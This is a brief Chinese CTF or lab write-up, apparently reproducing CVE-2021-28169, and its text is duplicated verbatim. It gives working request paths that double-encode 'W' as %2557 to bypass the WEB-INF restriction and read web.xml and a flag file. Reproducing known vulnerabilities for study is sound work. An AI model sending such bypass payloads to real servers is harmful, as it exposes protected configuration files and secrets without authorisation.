CVE-2021-28169复现

正常访问/static?/WEB-INF/web.xml发现访问不了

将W编码两次之后可以绕过/static?/%2557EB-INF/web.xml

查看flag/static?/%2557EB-INF/flag

CVE-2021-28169复现

正常访问/static?/WEB-INF/web.xml发现访问不了

将W编码两次之后可以绕过/static?/%2557EB-INF/web.xml

查看flag/static?/%2557EB-INF/flag
